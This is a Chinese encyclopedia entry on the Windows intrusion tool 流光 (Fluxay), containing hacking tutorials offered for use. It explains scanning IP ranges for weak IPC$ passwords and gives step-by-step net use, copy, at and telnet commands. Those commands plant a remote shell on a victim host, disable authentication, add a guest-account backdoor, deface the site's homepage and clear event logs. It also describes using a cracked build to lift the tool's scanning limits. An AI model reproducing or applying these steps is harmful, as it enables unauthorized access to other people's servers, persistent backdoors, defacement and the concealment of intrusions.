| 词条 | 流光 |
| 释义 | § 流光的破解可分为5大部分 : 一、POP3/FTP/…探测 二、IPC探测 三、SQL探测 四、高级扫描 五、其它 … 因为开发时间的原因,上面的探测模式略有不同,所以分成了四个部分,本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了:) § 流光的IPC探测 : 一、目的和任务: 1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。 2、学习IPC探测的相关知识。 二、探测流程: 1、你得有流光,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败! 什么是IPC: IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。 IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。 注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。 可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 … 2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。 在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。 3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机 4、探测中…… (注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样) 有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办么? :)有的是 !自己看看工具-菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。 黑了他 ! 开个dos prompt 执行如下命令,本次用的例子如下图。 1、 net use \\对方ipipc$ "密码" /user:"用户名" || 建立远程连接 2、 copy icmd.exe \\对方ipadmin$ || admin$是对方的winnt目录 :) 这里文件多。 3、 net time \\对方IP || 看看对方的本地时间 4、at \\对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。 5、 telnet 对方ip 端口 || 6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) || 7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe 如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:interpubwwwroot . 假如首页文件是default.htm并且在c:interpubwwwroot,这样:copy default.htm \\ipc$interpubwwwroot 下面的图有演示 8、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点: 执行我们copy 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :) 9、还能做成其他的么 ? 当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :) 10、日志清除,断开连接 : 执行我们copy 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use \\ipipc$ /delete § 流光入门教程 流光这款软件除了能够像X-Scan那样扫描众多漏洞、弱口令外,还集成了常用的入侵工具,如字典工具、NT/IIS工具等,还独创了能够控制“肉鸡”进行扫描的“流光Sensor工具”和为“肉鸡”安装服务的“种植者”工具。与X-Scan相比,流光的功能多一些,但操作起来难免繁杂。由于流光的功能过于强大,而且功能还在不断扩充中,因此流光的作者小榕限制了流光所能扫描的IP范围,不允许流光扫描国内IP地址,而且流光测试版在功能上也有一定的限制。但是,入侵者为了能够最大限度地使用流光,在使用流光之前,都需要用专门的破解程序对流光进行破解,去除IP范围和功能上的限制 这里我将以岁月联盟破解修改后的流光为例子 在使用之前 建议关闭本机防火墙 此外 在流光最下面可以设置扫描速度 建议不要设置得太快 就象我前几节课所说的 越快的扫描 错 报和漏报就越多 打开流光 如图1 流光 实例:使用流光高级扫描功能检测210.□.□.2到210.□.□.253网段主机的系统缺陷 步骤一:打开高级扫描向导、设置扫描参数。 在流光4.7主界面下,通过选择“文件(F)”→“高级扫描向导(W)”或使用快捷健“Ctrl+W”打开高级扫描向导。在“起始地址”和“结束地址”分别填入目标网段主机的开始和结束IP地址;在“目标系统”中选择预检测的操作系统类型;在“获取主机名”、“PING检查”前面打钩;在“检测项目”中,选择“全选”;选好后如图2 流光 下一步 可以设置端口 如图3 流光 下一步 对POP3 FTP SMTP IMAP TELNET CGI……等进行设置 全部设置完成以后 会自动跳出“选择流光主机” 着一般选择“本地主机”意思是表示使用本机进行扫描任务 全部设置完成后 流光会自动开始扫描 建议不要扫描太大的网段 特别是想中途停止扫描的话 如图5 流光 扫描完成以后 会自动打开扫描报告 如图6 流光 在最下面也会有相应的报告 如图7 流光 除了使用“高级扫描向导”以外,在“探测” - “高级扫描设置”里面也可以进行相应的设置 以上就是最最基础的扫描知识 可以说 流光是小榕所有精华软件的集合 功能强大可想而知 |
| 随便看 |
百科全书收录594082条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。